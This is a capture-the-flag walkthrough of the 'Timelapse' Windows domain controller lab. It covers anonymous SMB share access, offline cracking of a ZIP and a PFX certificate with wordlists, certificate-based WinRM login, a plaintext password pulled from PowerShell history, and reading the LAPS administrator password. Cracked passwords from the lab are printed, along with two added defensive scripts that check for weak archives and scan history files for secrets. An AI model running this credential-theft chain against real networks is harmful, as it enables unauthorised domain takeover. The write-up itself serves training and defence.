
Timelapse

Overview

A Windows machine released on 03/26/22, featuring:

  • Active Directory

  • SMB Shares

  • LAPS

  • LDAP

  • Crack Encrypted ZIP and PKCS12

  • WinRM Certificate-based Authentication

  • PowerShell History

Reconnaissance

General Information

  • Host name dc01.timelapse.htb

  • Domain name timelapse.htb

  • WinRM over HTTPS presents an expired TLS certificate

Port Scanning

  • TCP

    • Stealth (SYN) scanned

    • Open ports 53, 88 (Kerberos), 135, 139, 389, 5986 (WinRM/HTTPS)...

    • Revealing this is a DC (Domain Controller)

    • Domain timelapse.htb0

  • UDP, Top-500

    • 53, 123, 389

LDAP

  • Null bind test fails

$ ldapsearch -x -b 'dc=timelapse,dc=htb0'

SMB

  • Listing shares on the target with an anonymous login

    $ smbclient -U '' --no-pass -L //dc01.timelapse.htb
    
    		Sharename       Type      Comment
    		---------       ----      -------
    SMB1 disabled -- no workgroup available
    $ smbclient -U '' -L //dc01.timelapse.htb
    Enter WORKGROUP\'s password:
    
    		Sharename       Type      Comment
    		---------       ----      -------
    		ADMIN$          Disk      Remote Admin
    		C$              Disk      Default share
    		IPC$            IPC       Remote IPC
    		NETLOGON        Disk      Logon server share
    		Shares          Disk
    		SYSVOL          Disk      Logon server share
    SMB1 disabled -- no workgroup available
  • On the \\dc01.timelapse.htb\Shares share, found

    • folder HelpDesk containing LAPS related documents

    • folder Dev containing an encrypted file winrm_backup.zip

    • SYSVOL and NETLOGON return access denied

Initial Access

Crack ZIP encryption

  • Use zip2john to get the hash of the encrypted zip file

$ zip2john winrm_backup.zip > zip.hash
  • Crack the hash with john and get the password supremelegacy

──╼ $sudo john -wordlist:/home/htb-jackx8x7x/Desktop/Useful\ Repos/SecLists/Passwords/Leaked-Databases/rockyou.txt zip.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-03-28 05:23) 2.857g/s 9924Kp/s 9924Kc/s 9924KC/s surfrox1391..supergau
Use the "--show" option to display all of the cracked passwords reliably
Session completed
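john loads the hash as PKZIP, i.e. the archive was protected with the legacy ZipCrypto scheme rather than AES, which is what makes a wordlist attack on a backup like this cheap. The following Python script is an added example (not code from the original writeup) of the check a defender can run over archives found on a file share: it walks the ZIP local file headers and reports, per entry, whether it is unencrypted, ZipCrypto-protected, or AES-protected (WinZip AES uses compression method 99 plus the 0x9901 extra field). The sample archive bytes are constructed inline for the example; only the first entry name comes from this box, the others are hypothetical.

```python
import struct

LOCAL_SIG = b"PK\x03\x04"          # local file header signature
AES_EXTRA_ID = 0x9901              # WinZip AES extra-field header id
AES_STRENGTH = {1: "aes-128", 2: "aes-192", 3: "aes-256"}


def aes_scheme(extra: bytes) -> str:
    """Walk the extra-field list and return the AES strength from the 0x9901 record."""
    i = 0
    while i + 4 <= len(extra):
        hid, hlen = struct.unpack_from("<HH", extra, i)
        body = extra[i + 4:i + 4 + hlen]
        # body: vendor version(2) | vendor id 'AE'(2) | strength(1) | real method(2)
        if hid == AES_EXTRA_ID and len(body) >= 7 and body[2:4] == b"AE":
            return AES_STRENGTH.get(body[4], "aes-unknown")
        i += 4 + hlen
    return "aes-unknown"


def parse_local_headers(data: bytes) -> list:
    """Return one dict per local file header: name, encrypted flag, scheme, method."""
    entries = []
    off = 0
    while True:
        off = data.find(LOCAL_SIG, off)
        if off < 0 or off + 30 > len(data):
            break
        (_sig, _ver, flags, method, _mtime, _mdate, _crc,
         csize, _usize, nlen, elen) = struct.unpack_from("<4sHHHHHIIIHH", data, off)
        name = data[off + 30:off + 30 + nlen].decode("utf-8", "replace")
        extra = data[off + 30 + nlen:off + 30 + nlen + elen]
        encrypted = bool(flags & 0x1)      # general-purpose flag bit 0
        if not encrypted:
            scheme = "none"
        elif method == 99:                 # method 99 = WinZip AES wrapper
            scheme = aes_scheme(extra)
        else:
            scheme = "zipcrypto"           # legacy PKWARE stream cipher (john's "PKZIP")
        entries.append({"name": name, "encrypted": encrypted,
                        "scheme": scheme, "method": method})
        # Skip the entry payload. Entries using a data descriptor (flag bit 3)
        # carry csize == 0 here and are simply scanned past by signature.
        off += 30 + nlen + elen + csize
    return entries


def weak_entries(data: bytes) -> list:
    """Names of entries protected only by ZipCrypto, the case this box exploits."""
    return [e["name"] for e in parse_local_headers(data) if e["scheme"] == "zipcrypto"]


# --- constructed sample archive (local headers only, no central directory) ---
def _local_header(name: bytes, method: int, flags: int,
                  extra: bytes = b"", payload: bytes = b"") -> bytes:
    hdr = struct.pack("<4sHHHHHIIIHH", LOCAL_SIG, 20, flags, method, 0, 0, 0,
                      len(payload), len(payload), len(name), len(extra))
    return hdr + name + extra + payload


# AES extra field: id 0x9901, size 7, vendor version 2, 'AE', strength 3 (256-bit), method 8
AES256_EXTRA = struct.pack("<HHH", AES_EXTRA_ID, 7, 2) + b"AE" + b"\x03" + struct.pack("<H", 8)
SAMPLE_ZIP = (
    _local_header(b"legacyy_dev_auth.pfx", 8, 0x1, payload=b"\x00" * 24)             # ZipCrypto + deflate
    + _local_header(b"notes.txt", 99, 0x1, extra=AES256_EXTRA, payload=b"\x00" * 30)  # AES-256
    + _local_header(b"readme.txt", 0, 0x0, payload=b"plain text")                     # unencrypted
)

if __name__ == "__main__":
    for e in parse_local_headers(SAMPLE_ZIP):
        print(f"{e['name']:24} encrypted={e['encrypted']!s:5} scheme={e['scheme']}")
    print("weak:", weak_entries(SAMPLE_ZIP))
```

Pointed at a real file, `parse_local_headers(open(path, "rb").read())` gives the same report; any entry listed by `weak_entries` is one that should be re-packed with AES (or, better, never stored with credentials inside at all).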

Crack PKCS12

  • Unzipping the archive yields a file legacyy_dev_auth.pfx containing the string legacyy@timelapse.htb

    • Which is protected by a passphrase

  • Crack it with crackpkcs12

$sudo crackpkcs12 -d /home/htb-jackx8x7x/Desktop/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt ~/my_data/machine/timelapse/smb/legacyy_dev_auth.pfx

Dictionary attack - Starting 4 threads

*********************************************************
Dictionary attack - Thread 4 - Password found: thuglegacy
*********************************************************

WinRM

We can use this file to authenticate to the target over WinRM

  • Extract the private key and the client certificate from the .pfx file (openssl prompts for the passphrase thuglegacy), then log in with evil-winrm

    $ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy.key
    $ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy.crt
    $ evil-winrm -c legacyy.crt -k legacyy.key -i <IP> -S

Enumeration

Current User

  • timelapse\legacyy

  • Privileges

    • SeMachineAccountPrivilege

    • SeIncreaseWorkingSetPrivilege

  • Groups

    • Remote Management Users

    • Pre-Windows 2000 Compatible Access

    • TIMELAPSE\Development

Active Directory

  • Computer Accounts

    • DC01, DB01, WEB01, DEV01

    PS C:\> Get-ADComputer -Filter *
  • Users

    *Evil-WinRM* PS C:\Users\legacyy\Documents> get-aduser -filter *|select distinguishedname
    
    distinguishedname
    -----------------
    CN=Administrator,CN=Users,DC=timelapse,DC=htb
    CN=Guest,CN=Users,DC=timelapse,DC=htb
    CN=krbtgt,CN=Users,DC=timelapse,DC=htb
    CN=TheCyberGeek,OU=Admins,OU=Staff,DC=timelapse,DC=htb
    CN=Payl0ad,OU=Admins,OU=Staff,DC=timelapse,DC=htb
    CN=Legacyy,OU=Dev,OU=Staff,DC=timelapse,DC=htb
    CN=Sinfulz,OU=HelpDesk,OU=Staff,DC=timelapse,DC=htb
    CN=Babywyrm,OU=HelpDesk,OU=Staff,DC=timelapse,DC=htb
    CN=svc_deploy,CN=Users,DC=timelapse,DC=htb
    CN=TRX,OU=Admins,OU=Staff,DC=timelapse,DC=htb

LAPS

  • Check for the LAPS password attribute ms-mcs-admpwd

PS C:\> Get-ADObject 'CN=ms-mcs-admpwd,CN=Schema,CN=Configuration,DC=timelapse,DC=htb'

Privilege Escalation

  • By listing files recursively, found the PowerShell history

  • Alternatively, run the command Get-PSReadlineOption

    PS C:\> gci -recurse -file -force -ErrorAction ignore | ?{<some filter>}
  • And we get the password for user svc_deploy, who is a member of the LAPS_Readers group

*Evil-WinRM* PS C:\Users\legacyy> get-content C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\Con*
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
  • We can then read the local administrator password with

*Evil-WinRM* PS C:\> get-adobject -filter 'objectclass -eq "computer"' -properties ms-mcs-admpwd


DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-mcs-admpwd     : Me78u5,z{ml+N4VNl,rl)GxA
Name              : DC01
ObjectClass       : computer
ObjectGUID        : 6e10b102-6936-41aa-bb98-bed624c9b98f
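The history file above is the whole privilege escalation: a service-account password typed in clear text and saved by PSReadLine. As an added example that is not part of the original writeup, the following Python scanner is the kind of check a defender runs over collected ConsoleHost_history.txt files to find and redact such literals before the files are shipped to a SIEM or handed around. The history lines it scans are constructed for the example with placeholder passwords; the regexes are assumptions about common ways a secret ends up on a PowerShell command line, not an exhaustive list.

```python
import re

# Default PSReadLine history location under a user profile (the file this box leaked).
HISTORY_RELPATH = r"AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

# (label, regex) pairs; the named group 'secret' is the literal to redact.
SECRET_PATTERNS = [
    ("ConvertTo-SecureString with a literal string",
     re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?(?P<q>['\"])(?P<secret>[^'\"]+)(?P=q)", re.I)),
    ("PSCredential with a literal password",
     re.compile(r"PSCredential\s*\(\s*['\"][^'\"]*['\"]\s*,\s*(?P<q>['\"])(?P<secret>[^'\"]+)(?P=q)", re.I)),
    ("-Password argument given as a literal",
     re.compile(r"-Password\s+(?P<q>['\"]?)(?P<secret>[^'\"\s$(][^'\"\s]*)(?P=q)", re.I)),
    ("net user with a password on the command line",
     re.compile(r"\bnet\s+user\s+\S+\s+(?P<secret>[^/\s]\S*)", re.I)),
]


def redact(line: str, m: "re.Match") -> str:
    """Replace only the captured secret, keeping the rest of the command for triage."""
    return line[:m.start("secret")] + "***" + line[m.end("secret"):]


def scan_history(text: str) -> list:
    """Return one finding per (line, pattern) hit: line number, label, redacted line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, rx in SECRET_PATTERNS:
            m = rx.search(line)
            if m:
                findings.append({"line": lineno, "label": label, "redacted": redact(line, m)})
    return findings


# Constructed sample history: mirrors the shape of the leaked file, with placeholder secrets.
# Line 5 passes a SecureString variable ($p), which is not a literal and must not be flagged.
SAMPLE_HISTORY = """whoami
ipconfig /all
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Example-Secret-123' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
net user helpdesk_tmp Temp-Pass-42 /add
get-aduser -filter * -properties *
exit
"""

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']:>3}: {f['label']}\n           {f['redacted']}")
```

Run against a real profile, `scan_history(open(os.path.join(profile, HISTORY_RELPATH)).read())` does the same; a hit on a domain service account is the signal to rotate that credential, since anyone with read access to the profile (here, the legacyy user via WinRM) has already had it.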

Reference


  • Configure Powershell WinRM to use OpenSSL generated Self-Signed certificate

  • Microsoft LAPS Security & Active Directory LAPS Configuration Recon (Active Directory Security)

  • AD Enumeration (Pentest Everything)